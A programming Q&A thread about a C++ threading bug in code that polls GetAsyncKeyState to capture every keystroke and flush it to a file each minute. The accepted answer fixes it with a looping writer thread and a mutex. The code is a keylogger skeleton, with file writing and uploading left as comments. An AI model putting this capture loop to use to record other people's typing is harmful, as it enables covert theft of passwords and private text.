# Thread runs only once but he is in infinite while loop

Tags: c++, multithreading, winapi

So I'm trying to get all KEYSTROKES and once in a minute save it all in a file. so I got while loop to get the KEYSTROKES and everything goes very well in the first time but after it the thread ain't approaching to the function. nothing is crashed but the result is unaccepted.

```
string content = ""; // global
while (true)
{
   std::thread t(WriteKeyStrokesToFile);
   for (keyStroke = 8; keyStroke < 190; keyStroke++)
   {
       if (GetAsyncKeyState(keyStroke) & 0x0001)
       {
           if (KeyIsSpecial(keyStroke) == false)
           {
                content += keyStroke;
                cout << keyStroke;
           }
       }
   }
   t.detach();
}
void WriteKeyStrokesToFile()
  {
   std::this_thread::sleep_for(std::chrono::seconds(60));
   //open file and upload content to file
   content = ""; //empty the content
  }
```

Comment: Detatching threads is usually not a good idea.

Comment: If I got it right you concurrently access `content` in two threads without locking. That's IMHO a bad idea and good for any surprising behavior. Btw. you didn't expose the declaration/definition of `content`. You should complete your code to make this a [mcve].

Comment: @Scheff well because of the sleep I thought that don't need any lock cause it won't be approached by that time/

Comment: Your forced timing does not solve any problem. Locking ensures much more like introducing memory barriers, which may restrict (otherwise) possible re-ordering of code, writing back register values to memory, possible updates of caches, etc. And last but not least, why do you thing a file operation _must_ be done in 5 seconds? Say it's a network drive and network is temporarily under heavy load (or just not accessible) but timeouts are (at least on my Windows 10 laptop) round about 60 seconds...

Comment: I have added mutexes, it ain't about the time(60sec) cause I have tried with 60 as well and I have got same results the function  WriteKeyStrokesToFile is getting called only one time that my major problem. and that's my question why is the thread works only 1 time although he is on an infinite while loop.

Comment: GetAsyncKeyState is not the correct way to do this.

Answer (score 3):

> the function  WriteKeyStrokesToFile is getting called only one time

As it should be. A thread runs its function only once. When the function exits, that's it, the thread is done. You can't restart the thread, all you can do is create a new thread.

> why is the thread works only 1 time although he is on an infinite while loop.

Because you don't have a loop inside of the thread at all. You have a loop in code that runs outside of the thread, supplying data to the thread.

To do what you want, simply add a loop inside of your `WriteKeyStrokesToFile()` function so it keeps running. And don't create a new thread on every iteration of the loop that runs outside of the thread.

```
std::string content = ""; // global
std::mutex content_mutex;

void WriteKeyStrokesToFile()
{
    while (true) {
        std::this_thread::sleep_for(std::chrono::seconds(60));
        std::lock_guard<std::mutex> g(content_mutex);
        //open file and upload content to file
        content = ""; //empty the content
    }
}

void AddKeyStroke(char keyStroke)
{
    std::lock_guard<std::mutex> g(content_mutex);
    content += keyStroke;
}

int main()
{
    std::thread t(WriteKeyStrokesToFile);

    while (true) {
        for (keyStroke = 8; keyStroke < 190; keyStroke++) {
            if (GetAsyncKeyState(keyStroke) & 0x0001) {
                if (KeyIsSpecial(keyStroke) == false) {
                    AddKeyStroke(keyStroke);
                    std::cout << keyStroke;
                }
            }
        }
    }

    t.join();
    return 0;
}
```